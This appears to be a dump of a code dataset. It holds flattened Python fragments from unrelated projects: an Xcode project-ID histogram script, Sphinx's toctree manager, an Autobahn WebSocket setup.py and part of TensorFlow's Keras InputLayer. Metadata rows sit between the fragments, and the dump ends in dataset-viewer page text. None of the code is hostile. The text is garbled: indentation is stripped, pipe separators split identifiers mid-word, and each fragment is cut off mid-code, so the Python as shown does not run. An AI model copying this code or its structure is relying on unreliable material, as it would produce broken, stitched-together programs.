c = text[idx:idx+2]
# Skip the other half of the lead and trail surrogate
idx += 1
idx += 1
yield c
def build_emoji_table():
with codecs.open(rel('emojis.txt'), 'r', encoding='utf-8') as f:
text = f.read()
uniques = set()
for c in iterchars(text):
# Only use unicode chars >= 0x100 (emoji etc.)
if len(c) >= 2 or ord(c) >= 0x100:
if c not in uniques:
emojis.append(c)
uniques.add(c)
def print_emoji_table():
per_line = 32
for i in range(len(emojis)):
if i % per_line == 0:
write("%3d" % i, end=' ')
write(emojis[i], end=' ')
if i % per_line == per_line - 1:
writeline()
writeline()
def print_emoji_histo(histo):
all_users = set()
for year, users in histo.items():
all_users.update(users)
all_users = sorted(all_users)
num_users = len(all_users)
for year, users in histo.items():
chars = [str(year), ' ']
for i in range(num_users):
if all_users[i] in users:
c = emojis[all_users[i]] + ' '
else:
c = ' '
chars.append(c)
write(''.join(chars))
write('\n')
def print_histo(histo, utcoffset=0):
maximum = max(histo.values())
max_display = 60
for k in sorted(histo):
if utcoffset != 0:
localhour = (k - utcoffset) % 24
else:
localhour = k
v = histo.get(localhour, 0)
stars = '*' * int(v * max_display / float(maximum))
write("%3d %5d %s" % (k, v, stars))
writeline()
def gidtable(filename):
with open(filename, 'rb') as f:
xcodeproj = f.read()
root, parseinfo = xcodeprojer.parse(xcodeproj)
if root is not None:
unparser = xcodeprojer.Unparser(root)
# We don't need the parse tree, only access to the gidcomments
# that are built during the unparse.
_ = unparser.unparse(root, projectname=xcodeprojer.projectname_for_path(filename))
gidcomments = unparser.gidcomments
c = '.'
else:
gidcomments = {}
c = 'X'
sys.stdout.write(c)
sys.stdout.flush()
return filename, gidcomments
def histogram(args, utcoffset=0):
if args.emoji or args.emojitable:
write("Please be patient when your computer is caching emoji fonts for you. This might take a minute.\n")
build_emoji_table()
if args.emojitable:
print_emoji_table()
return
path = args.directory
histo_year = Counter()
histo_hour = Counter()
users_per_year = defaultdict(set)
pool = multiprocessing.Pool(initializer=utils.per_process_init)
filenames = xcodeprojer.find_projectfiles(path)
results = []
write("Looking for Xcode ids in project files...")
sys.stdout.flush()
for idx, filename in enumerate(filenames):
results.append(pool.apply_async(gidtable, [filename]))
if args.max_files is not None and idx + 1 >= args.max_files:
break
pool.close()
try:
for asyncresult in results:
filename, gids = asyncresult.get()
for gid in gids:
fields = xcodeprojer.gidfields(gids, gid)
refdate = fields['date']
dt = xcodeprojer.datetime_from_utc(refdate)
histo_hour[dt.hour] += 1
year = dt.year
if args.startyear <= year <= args.endyear:
histo_year[year] += 1
users_per_year[year].add(fields['user'])
except (KeyboardInterrupt, GeneratorExit):
pool.terminate()
finally:
pool.join()
writeline()
write("At which hours are new Xcode ids created (UTC time offset: %d)" % args.utcoffset)
print_histo(histo_hour, utcoffset=utcoffset)
write("In which years were the Xcode ids created (we only look at %s-%s)" % (args.startyear, args.endyear))
print_histo(histo_year)
write("Estimated number of users creating new Xcode ids by year")
user_histo = {k: len(v) for (k, v) in users_per_year.items()}
print_histo(user_histo)
writeline()
write("The following is a list of names that might be completely unrelated to the examined Xcode projects.")
write("For something for tangible replace firstnames.txt with your own list.")
writeline()
max_firstnames_limited = print_names(args, users_per_year, emoji=args.emoji)
if args.emoji:
write("Looking for Xcode ids in project files...")
print_emoji_histo(users_per_year)
if max_firstnames_limited and args.max_firstnames is None:
write("The number of first names to | consider was limited to %d, this can be changed with --max-firstnames" % max_firstnames_limited)
def prin | t_names(args, users_per_year, emoji=False):
userhashes = defaultdict(list)
max_firstnames = args.max_firstnames
if max_firstnames is None:
max_firstnames = DEFAULT_FIRSTNAMES
max_firstnames_limited = None
with codecs.open(rel('firstnames.txt'), 'r', encoding='utf-8') as f:
firstnames = f.read().splitlines()
for idx, name in enumerate(firstnames):
if idx >= max_firstnames:
max_firstnames_limited = max_firstnames
break
userhashes[user_hash(name)].append(name)
for year, hashes in sorted(users_per_year.items()):
write(str(year), end=' ')
for h in sorted(hashes):
candidates = userhashes[h]
if candidates:
if emoji:
symbol = emojis[h] + ' '
else:
symbol = ''
write(' (%s' % symbol + ' | '.join(candidates) + ')', end=' ')
writeline()
return max_firstnames_limited
def main():
parser = argparse.ArgumentParser(description='Show some histograms for a directory a Xcode project files.')
parser.add_argument('-u', '--utcoffset |
bgris/ODL_bgris | lib/python3.5/site-packages/Sphinx-1.5.1-py3.5.egg/sphinx/environment/managers/toctree.py | Python | gpl-3.0 | 25,403 | 0.000512 | # -*- coding: utf-8 -*-
"""
sphinx.environment.managers.toctree
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Toctree manager for sphinx.environment.
:copyright: Copyright 2007-2016 by the Sphinx team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from six import iteritems
from docutils import nodes
from sphinx import addnodes
from sphinx.util import url_re
from sphinx.util.nodes import clean_astext, process_only_nodes
from sphinx.transforms import SphinxContentsFilter
from sphinx.environment.managers import EnvironmentManager
class Toctree(EnvironmentManager):
name = 'toctree'
def __init__(self, env):
super(Toctree, self).__init__(env)
self.tocs = env.tocs
self.toc_num_entries = env.toc_num_entries
self.toc_secnumbers = env.toc_secnumbers
self.toc_fignumbers = env.toc_fignumbers
self.toctree_includes = env.toctree_includes
self.files_to_rebuild = env.files_to_rebuild
self.glob_toctrees = env.glob_toctrees
self.numbered_toctrees = env.numbered_toctrees
def clear_doc(self, docname):
self.tocs.pop(docname, None)
self.toc_secnumbers.pop(docname, None)
self.toc_fignumbers.pop(docname, None)
self.toc_num_entries.pop(docname, None)
self.toctree_includes.pop(docname, None)
self.glob_toctrees.discard(docname)
self.numbered_toctrees.discard(docname)
for subfn, fnset in list(self.files_to_rebuild.items()):
fnset.discard(docname)
if not fnset:
del self.files_to_rebuild[subfn]
def merge_other(self, docnames, other):
for docname in docnames:
self.tocs[docname] = other.tocs[docname]
self.toc_num_entries[docname] = other.toc_num_entries[docname]
if docname in other.toctree_includes:
self.toctree_includes[docname] = other.toctree_includes[docname]
if docname in other.glob_toctrees:
self.glob_toctrees.add(docname)
if docname in other.numbered_toctrees:
self.numbered_toctrees.add(docname)
for subfn, fnset in other.files_to_rebuild.items():
self.files_to_rebuild.setdefault(subfn, set()).update(fnset & docnames)
def process_doc(self, docname, doctree):
"""Build a TOC from the doctree and store it in the inventory."""
numentries = [0] # nonlocal again...
def traverse_in_section(node, cls):
"""Like traverse(), but stay within the same section."""
result = []
if isinstance(node, cls):
result.append(node)
for child in node.children:
if isinstance(child, nodes.section):
continue
result.extend(traverse_in_section(child, cls))
return result
def build_toc(node, depth=1):
entries = []
for sectionnode in node:
# find all toctree nodes in this section and add them
# to the toc (just copying the toctree node which is then
# resolved in self.get_and_resolve_doctree)
if isinstance(sectionnode, addnodes.only):
onlynode = addnodes.only(expr=sectionnode['expr'])
blist = build_toc(sectionnode, depth)
if blist:
onlynode += blist.children
entries.append(onlynode)
continue
if not isinstance(sectionnode, nodes.section):
for toctreenode in traverse_in_section(sectionnode,
addnodes.toctree):
item = toctreenode.copy()
entries.append(item)
# important: do the inventory stuff
self.note_toctree(docname, toctreenode)
continue
title = sectionnode[0]
# copy the contents of the section title, but without references
# and unnecessary stuff
visitor = SphinxContentsFilter(doctree)
title.walkabout(visitor)
nodetext = visitor.get_entry_text()
if not numentries[0]:
# for the very first toc entry, don't add an anchor
# as it is the file's title anyway
anchorname = ''
else:
anchorname = '#' + sectionnode['ids'][0]
numentries[0] += 1
# make these nodes:
# list_item -> compact_paragraph -> reference
reference = nodes.reference(
'', '', internal=True, refuri=docname,
anchorname=anchorname, *nodetext)
para = addnodes.compact_paragraph('', '', reference)
item = nodes.list_item('', para)
sub_item = build_toc(sectionnode, depth + 1)
item += sub_item
entries.append(item)
if entries:
return nodes.bullet_list('', *entries)
return []
toc = build_toc(doctree)
if toc:
self.tocs[docname] = toc
else:
self.tocs[docname] = nodes.bullet_list('')
self.toc_num_entries[docname] = numentries[0]
def note_toctree(self, docname, toctreenode):
"""Note a TOC tree directive in a document and gather information about
file relations from it.
"""
if toctreenode['glob']:
self.glob_toctrees.add(docname)
if toctreenode.get('numbered'):
self.numbered_toctrees.add(docname)
includefiles = toctreenode['includefiles']
for includefile in includefiles:
# note that if the | included file is rebuilt, this one must be
# too (since the TOC of the included file could have changed)
self.files_to_rebuild.setdefault(includefile, set()).add(docname)
self.toctree_includes.setdefault(docname, []).extend(includefiles)
def get_toc_for(self, docname, builder):
"""Return a TOC nodetree -- for use on the same page only!"""
tocdepth = self.env.metadata[docname].get('tocdep | th', 0)
try:
toc = self.tocs[docname].deepcopy()
self._toctree_prune(toc, 2, tocdepth)
except KeyError:
# the document does not exist anymore: return a dummy node that
# renders to nothing
return nodes.paragraph()
process_only_nodes(toc, builder.tags, warn_node=self.env.warn_node)
for node in toc.traverse(nodes.reference):
node['refuri'] = node['anchorname'] or '#'
return toc
def get_toctree_for(self, docname, builder, collapse, **kwds):
"""Return the global TOC nodetree."""
doctree = self.env.get_doctree(self.env.config.master_doc)
toctrees = []
if 'includehidden' not in kwds:
kwds['includehidden'] = True
if 'maxdepth' not in kwds:
kwds['maxdepth'] = 0
kwds['collapse'] = collapse
for toctreenode in doctree.traverse(addnodes.toctree):
toctree = self.env.resolve_toctree(docname, builder, toctreenode,
prune=True, **kwds)
if toctree:
toctrees.append(toctree)
if not toctrees:
return None
result = toctrees[0]
for toctree in toctrees[1:]:
result.extend(toctree.children)
return result
def resolve_toctree(self, docname, builder, toctree, prune=True, maxdepth=0,
titles_only=False, collapse=False, includehidden=False):
"""Resolve a *toctree* node into individual bullet lists with titles
as items, returning None (if no containing titles are found) or
a new node.
If *prune* is True, the tree is pruned to *maxdepth*, or if that is 0,
to the value of the *maxdepth* option on the *toctree* node.
If *titles_only* is T |
meejah/AutobahnPython | examples/twisted/websocket/echo_service/setup.py | Python | mit | 1,892 | 0 | ###############################################################################
#
# The MIT License (MIT)
#
# Copyright (c) Tavendo GmbH
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyr | ight notice and this permission notice shall be | included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
###############################################################################
from setuptools import setup, find_packages
LONGDESC = """
A WebSocket echo service implemented as a Twisted service and
deployed as a twistd plugin.
"""
setup(
name='echows',
version='0.1.0',
description='Autobahn WebSocket Echo Service',
long_description=LONGDESC,
author='Tavendo GmbH',
url='http://crossbar.io/autobahn',
platforms=('Any'),
install_requires=['Twisted>=Twisted-12.2',
'Autobahn>=0.5.9'],
packages=find_packages() + ['twisted.plugins'],
# packages = ['echows', 'twisted.plugins'],
include_package_data=True,
zip_safe=False
)
|
petewarden/tensorflow | tensorflow/python/keras/engine/input_layer.py | Python | apache-2.0 | 16,362 | 0.004462 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=protected-access
"""Input layer code (`Input` and `InputLayer`).
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.distribute import distribution_strategy_context
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_spec
from tensorflow.python.keras import backend
from tensorflow.python.keras.distribute import distributed_training_utils
from tensorflow.python.keras.engine import base_layer
from tensorflow.python.keras.engine import keras_tensor
from tensorflow.python.keras.engine import node as node_module
from tensorflow.python.keras.saving.saved_model import layer_serialization
from tensorflow.python.keras.utils import tf_utils
from tensorflow.python.util.tf_export import keras_export
def _assert_other_arg_none(arg_name, arg):
if arg is not None:
raise ValueError('When `type_spec` is not None, all other args '
'except `name` must be None, '
'but %s is not None.' % arg_name)
@keras_export('keras.layers.InputLayer')
class InputLayer(base_layer.Layer):
"""Layer to be used as an entry point into a Network (a graph of layers).
It can either wrap an existing tensor (pass an `input_tensor` argument)
or create a placeholder tensor (pass arguments `input_shape`, and
optionally, `dtype`).
It is generally recommend to use the functional layer API via `Input`,
(which creates an `InputLayer`) without directly using `InputLayer`.
When using InputLayer with Keras Sequential model, it can be skipped by
moving the input_shape parameter to the first layer after the InputLayer.
This class can create placeholders for tf.Tensors, tf.SparseTensors, and
tf.RaggedTensors by choosing 'sparse=True' or 'ragged=True'. Note that
'sparse' and 'ragged' can't be configured to True at same time.
Usage:
```python
# With explicit InputLayer.
model = tf.keras.Sequential([
tf.keras.layers.InputLayer(input_shape=(4,)),
tf.keras.layers.Dense(8)])
model.compile(tf.optimizers.RMSprop(0.001), loss='mse')
model.fit(np.zeros((10, 4)),
np.ones((10, 8)))
# Without InputLayer and let the first layer to have the input_shape.
# Keras will add a input for the model behind the scene.
model = tf.keras.Sequential([
tf.keras.layers.Dense(8, input_shape=(4,))])
model.compile(tf.optimizers.RMSprop(0.001), loss='mse')
model.fit(np.zeros((10, 4)),
np.ones((10, 8)))
```
Args:
input_shape: Shape tuple (not including the batch axis), or `TensorShape`
instance (not including the batch axis).
batch_size: Optional input batch size (integer or None).
dtype: Optional datatype of the input. When not provided, the Keras
default float type will be used.
input_tensor: Optional tensor to use as layer input. If set, the layer
will use the `tf.TypeSpec` of this tensor rather
than creating a new placeholder tensor.
sparse: Boolean, whether the placeholder created is meant to be sparse.
Default to False.
ragged: Boolean, whether the placeholder created is meant to be ragged.
In this case, values of 'None' in the 'shape' argument represent
ragged dimensions. For more information about RaggedTensors, see
[this guide](https://www.tensorflow.org/guide/ragged_tensors).
Default to False.
type_spec: A `tf.TypeSpec` object to create Input from. This `tf.TypeSpec`
represents the entire batch. When provided, all other args except
name must be None.
name: Optional name of the layer (string).
"""
def __init__(self,
input_shape=None,
batch_size=None,
dtype=None,
input_tensor=None,
sparse=None,
name=None,
ragged=None,
type_spec=None,
**kwargs):
self._init_input_shape = input_shape
self._init_batch_size = batch_size
self._init_dtype = dtype
self._init_sparse = sparse
self._init_ragged = ragged
self._init_type_spec = type_spec
strategy = distribution_strategy_context.get_strategy()
if strategy and batch_size is not None and \
distributed_training_utils.global_batch_size_supported(strategy):
if batch_size % strategy.num_replicas_in_sync != 0:
raise ValueError('The `batch_size` argument ({}) must be divisible by '
'the number of replicas ({})'.format(
batch_size, strategy.num_replicas_in_sync))
batch_size = batch_size // strategy.num_replicas_in_sync
if 'batch_input_shape' in kwargs:
batch_input_shape = kwargs.pop('batch_input_shape')
if input_shape and batch_input_shape:
raise ValueError('Only provide the input_shape OR '
'batch_input_shape argument to '
'InputLayer, not both at the same time.')
# Set the input shape and batch size from the batch_input_shape.
# Note that batch_input_shape can be None (unknown rank) or [] (scalar),
# in which case the batch size must be None.
if batch_input_shape:
batch_size = batch_input_shape[0]
input_shape = batch_input_shape[1:]
if kwargs:
raise ValueError('Unrecognized keyword arguments:', kwargs.keys())
if sparse and ragged:
raise ValueError(
'Cannot set both sparse and ragged to True in a Keras input.')
if not name:
prefix = 'input'
name = prefix + '_' + str(backend.get_uid(prefix))
if not dtype:
if input_tensor is None:
dtype = backend.floatx()
else:
dtype = backend.dtype(input_tensor)
elif input_tensor is not None and input_tensor.dtype != dtype:
raise ValueError('`input_tensor.dtype` differs from `dtype`: %s vs. %s' %
(input_tensor.dtype, dtype))
super(InputLayer, self).__init__(dtype=dtype, name=name)
self.built = True
self.sparse = True if sparse else False
self.ragged = True if ragged else False
self.batch_size = batch_size
self.supports_masking = True
if isinstance(input_shape, tensor_shape.TensorShape):
input_shape = tuple(input_shape.as_list())
elif isinstance(input_shape, int):
input_shape = (input_shape,)
if type_spec is not None:
args_that_must_be_none = [
('(input_)shape', self._init_input_shape),
('batch_size', self._init_batch_size),
('dtype', self._init_dtype),
('input_tensor', input_tensor),
('sparse', self._init_sparse),
('ragged', self._init_ragged),
]
for arg_name, arg in args_that_must_be_none:
_assert_other_arg_none(arg_name, arg)
if | not ops.executing_eagerly_outside_functions():
raise ValueError('Creating Keras inputs from a type_spec is only '
'supported when eager execution is enabled.')
input_tensor = keras_tensor.keras_tensor_from_type_spec(type_spec)
if isinstance(input_tensor, keras_tensor.SparseKerasTensor):
self.sparse = True
if isinstance(input_tensor, keras_tensor.RaggedKerasTensor):
| self.ragged = True
self.is_placeholder = True
try:
self._batch_input_shape = tuple(input_tensor.sha |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.